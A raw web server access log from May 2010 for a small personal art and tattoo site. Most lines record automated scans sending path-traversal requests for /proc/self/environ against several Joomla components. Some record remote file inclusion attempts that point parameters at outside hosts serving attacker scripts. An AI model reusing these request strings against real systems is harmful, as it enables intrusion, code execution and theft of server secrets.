209.44.120.2 - - [28/May/2010:00:27:21 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:00:27:37 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.228.226.12 - - [28/May/2010:00:30:23 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [28/May/2010:00:30:24 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [28/May/2010:00:30:24 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.133.201.194 - - [28/May/2010:00:30:24 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:00:30:24 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:00:30:24 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
207.46.13.140 - - [28/May/2010:00:30:28 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.65.134 - - [28/May/2010:00:31:11 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:12 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:12 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:20 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:20 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:20 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:57 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:57 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:58 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:31:58 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.133.201.194 - - [28/May/2010:00:31:58 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.65.134 - - [28/May/2010:00:31:58 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.133.201.194 - - [28/May/2010:00:31:58 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.65.134 - - [28/May/2010:00:31:58 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.133.201.194 - - [28/May/2010:00:31:58 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.228.226.12 - - [28/May/2010:00:32:40 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.133.201.194 - - [28/May/2010:00:32:50 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.65.134 - - [28/May/2010:00:33:26 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.133.201.194 - - [28/May/2010:00:33:26 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.65.134 - - [28/May/2010:00:33:33 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:33:46 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [28/May/2010:00:33:47 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.228.226.12 - - [28/May/2010:00:34:30 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [28/May/2010:00:34:30 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [28/May/2010:00:34:30 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
87.250.255.243 - - [28/May/2010:00:35:21 -0500] "GET /logs/access_log.1258070400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.235.124.132 - - [28/May/2010:00:35:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
66.235.124.132 - - [28/May/2010:00:35:26 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [28/May/2010:00:35:26 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [28/May/2010:00:35:26 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [28/May/2010:00:35:26 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [28/May/2010:00:35:26 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [28/May/2010:00:35:26 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
67.228.226.12 - - [28/May/2010:00:36:51 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
120.50.40.133 - - [28/May/2010:00:40:27 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
120.50.40.133 - - [28/May/2010:00:40:27 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [28/May/2010:00:40:28 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.195.112.180 - - [28/May/2010:00:40:42 -0500] "GET /logs/access_log.1190332800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.233 - - [28/May/2010:00:41:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.199.233 - - [28/May/2010:00:41:53 -0500] "GET /artwork/face_pz2.JPG HTTP/1.1" 200 17945 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
212.47.221.153 - - [28/May/2010:00:42:38 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:42:39 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:42:39 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:42:42 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:42:49 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:42:49 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:42:50 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:42:52 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:43:02 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:43:03 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:43:03 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
212.47.221.153 - - [28/May/2010:00:43:06 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.812"
204.152.200.50 - - [28/May/2010:00:43:26 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:00:43:30 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:00:43:31 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
120.50.40.133 - - [28/May/2010:00:43:34 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.46.194.75 - - [28/May/2010:00:43:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.75 - - [28/May/2010:00:43:40 -0500] "GET /rachel%20study/rachel-saint5a.jpg HTTP/1.1" 404 315 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [28/May/2010:00:47:45 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.230 - - [28/May/2010:00:48:29 -0500] "GET /logs/access_log.1178323200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.14.231.236 - - [28/May/2010:00:48:32 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 286 "-""libwww-perl/5.805"
74.14.231.236 - - [28/May/2010:00:48:32 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 281 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:00:48:53 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
121.88.4.141 - - [28/May/2010:00:49:01 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
65.60.53.122 - - [28/May/2010:00:49:26 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:00:49:28 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:00:49:29 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:00:49:29 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:00:49:29 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
114.108.151.149 - - [28/May/2010:00:49:37 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.60.53.122 - - [28/May/2010:00:50:32 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:00:51:19 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
65.60.53.122 - - [28/May/2010:00:51:19 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
114.108.151.149 - - [28/May/2010:00:51:32 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.6.10.110 - - [28/May/2010:00:51:53 -0500] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://rxnzm.interfree.it/id.jpg?? HTTP/1.1" 404 327 "-""libwww-perl/5.831"
89.6.10.110 - - [28/May/2010:00:51:54 -0500] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://rxnzm.interfree.it/id.jpg?? HTTP/1.1" 404 332 "-""libwww-perl/5.831"
114.108.151.149 - - [28/May/2010:00:52:17 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:00:52:34 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:00:53:05 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:00:53:42 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [28/May/2010:00:54:27 -0500] "GET /logs/access_log.1231545600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [28/May/2010:00:55:28 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:00:55:31 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:00:56:04 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:00:56:11 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:00:56:11 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:00:56:12 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.37.183.194 - - [28/May/2010:00:58:27 -0500] "GET /logs/access_log.1271548800/?sourcedir=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:00:58:27 -0500] "GET /?sourcedir=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:00:58:27 -0500] "GET /logs/?sourcedir=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 200 7289 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:00:58:51 -0500] "GET /logs/access_log.1271548800/?sourcedir=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:00:58:51 -0500] "GET /logs/?sourcedir=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 200 7289 "-""Mozilla/5.0"
174.37.183.194 - - [28/May/2010:00:58:51 -0500] "GET /?sourcedir=http://www.hotelcesareaugustus.com/swf/idxx.pdf?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
209.44.120.2 - - [28/May/2010:01:00:18 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:01:00:18 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.2 - - [28/May/2010:01:00:18 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:00:46 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.151.149 - - [28/May/2010:01:01:18 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
204.152.200.50 - - [28/May/2010:01:03:23 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:03:23 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:03:23 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:03:56 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
204.152.200.50 - - [28/May/2010:01:03:57 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
